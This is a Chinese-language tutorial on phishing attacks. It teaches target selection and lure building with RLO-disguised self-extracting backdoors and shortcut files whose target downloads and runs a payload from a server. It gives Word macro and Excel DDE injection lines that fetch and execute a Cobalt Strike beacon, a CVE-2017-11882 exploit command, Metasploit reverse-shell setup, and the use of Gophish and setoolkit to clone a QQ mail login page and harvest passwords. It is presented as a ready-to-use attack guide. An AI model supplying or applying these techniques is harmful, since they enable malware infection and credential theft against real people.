《网络安全0-100》网络钓鱼“骚”姿势[一文就学会]

一、什么是钓鱼

网络钓鱼是通过伪造银行或其他知名机构向他人发送垃圾邮件，意图引诱收信人给出敏感信息(如用户名、口令、帐号 ID 、 ATM PIN 码或信用卡详细信息)的一种攻击方式。

二、网络钓鱼的基本流程

钓鱼一般分为三个步骤：寻找大鱼，制作鱼饵和抛竿寻找大鱼：我们的目标一般包括：HR、销售、文员等安全意识比较薄弱的人员，以及运维、开发等掌握重要资源的人员。制作鱼饵：一个高质量鱼饵一般分为两部分，一个是邮件内容更加的逼真可信，另一个是邮件的附件尽可能伪装的正常抛竿：最后把鱼竿抛出后就可以坐等鱼上钩了

三、如何制作高质量鱼饵

0x01.自解压+RLO制作思路：

利用自解压文件的特性，解压后令其自动执行解压出来的文件，达到上线的目的，由于自解压文件后缀为exe，很容易被识破，所以我们还需使用RLO后缀反转进行一些伪装。步骤一：用cs生成windows后门

 步骤二：随便准备一张图片，使用WinRAR把后门和图片一块自解压

 压缩文件时需在高级——自解压选项中进行一些的设置使木马的执行更加隐蔽：

常规——解压路径：C:\windows\temp

设置——解压后运行:C:\windows\temp\artifact.exe

C:\windows\temp\壁纸.jpg

模式——全部隐藏

更新——更新模式——解压并更新文件

更新——覆盖模式——覆盖所有文件

 步骤三：使用resourcehacker更换文件图标,将其伪装成图片

 步骤四：把文件重命名为壁纸gpj.exe，再使用RLO对后缀进行反转，最后效果如下

 结合邮件钓鱼等方式把“图片”放送给他人，引诱他人上钩

对方双击“图片”后，会同时执行artifact.exe和壁纸.jpg，而且上线cs

 0x02.快捷方式制作思路：

运行快捷键方式时，执行命令让其下载我们提前放在服务器上的后门程序并且运行

步骤一：cs生成后门，放到服务器网站目录下

 步骤二：创建快捷方式，在目标中写入以下代码

C:\Windows\System32\cmd.exe /k curl http://xxx.xxx.xxx.xxx/exe/artifact.exe --output C:\Windows\temp\win.exe && C:\Windows\temp\win.exe

 步骤三：更换图标，增加其真实性

 

 当对方双击快捷键方式时就会下载我们准备好的artifact.exe并且执行

 0x03.Word宏病毒

宏病毒是Word中被嵌入的带有恶意行为的宏代码（VBA代码），当我们双击打开带有宏病毒的word文档的时候它的宏代码会自动运行。步骤一：使用cs生成恶意vba代码

 

 步骤二：新建doc文档，创建宏，保存即可

 步骤三：再次打开文件后提示是否启用宏，点击启用就会上线cs

 

 0x04.Excel注入

Excel注入是一种将包含恶意命令的excel公式插入到可以导出csv或xls等格式的文本中，当在excel中打开xls文件时，文件会转换为excel格式并提供excel公式的执行功能，从而造成命令执行。

利用excel注入弹出计算器

注入代码:=cmd| '/c calc'! '!A1'

 

 利用excel注入上线cs步骤一：

使用cs生成exe后门，并放到服务器上

 步骤二：更换恶意代码

=cmd| '/c curl http://xxx.xxx.xxx.xxx/beacon.exe --output C:\Windows\temp\win.exe && C:\Windows\temp\win.exe' ! 'A1'

 当双击打开该excel时就会执行恶意代码下载cs后门并运行 ，上线cs 

 0x05.CVE-2017-11882

cve-2017-11882漏洞也是word钓鱼的一种方式，相比宏病毒更加的隐蔽，把word伪装成某某通知文件，目标点击后就直接可以直接上线。

利用cve-2017-11882弹出计算器：

下载poc：https://github.com/Ridter/CVE-2017-11882

生成带有病毒的word文件

python2 Command109b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

 

 双击test.doc，弹出计算器

 利用cve-2017-11882上线msf

步骤一：使用exploit/windows/misc/hta_server生成病毒

use exploit/windows/misc/hta_serverset payload windows/meterpreter/reverse_httpset lport 4444show optionsexploit

 步骤二：生成带病毒的doc文件并伪装为通知文件

 受害人打开word，msf就会上线shell

 四、邮件伪造

Swaks

Swaks是kali自带的一款邮件伪造工具，通过swaks可以向任意目标发送任意内容的邮件

 

 现在的邮箱都有某种检测机制，要想他人发邮件，这种方法就不太行了

Gophish

Gophish是一个开源的钓鱼工具包，自带web面板，对于邮件编辑、网站克隆、数据可视化、批量发送等功能的使用带来的极大的便捷。

伪造中奖通知邮件，发送附件

 效果看着还可以，文件再免杀一下就更好了

 第二种方法，邮件正文中插入克隆网站

 然后克隆一个qq邮箱的登录页面，引诱其输入账户密码

 

 如果对方提交输入账户密码就会在gophish中显示出来

 五、网站克隆

0x01、setoolkit说到克隆网站，kali上自带的setoolkit给我们提供了很大的方便，不仅可以记录用户提交的数据，还可以进行注入攻击setoolkit克隆网站

1、启动setoolkit，选者1，社工攻击

1) Spear-Phishing Attack Vectors【鱼叉式网络钓鱼攻击】

2) Website Attack Vectors【web网站式攻击-钓鱼(常用)】

3) Infectious Media Generator【传染性木马】

4) Create a Payload and Listener【创建payload和监听器】

5) Mass Mailer Attack【邮件群发攻击】

6) Arduino-Based Attack Vector【基于安卓的攻击】

7) Wireless Access Point Attack Vector【wifi攻击】

8) QRCode Generator Attack Vector【生成二维码(就普通二维码)】 9) Powershell Attack Vectors【Powershell攻击】 10) Third Party Modules【第三方模块】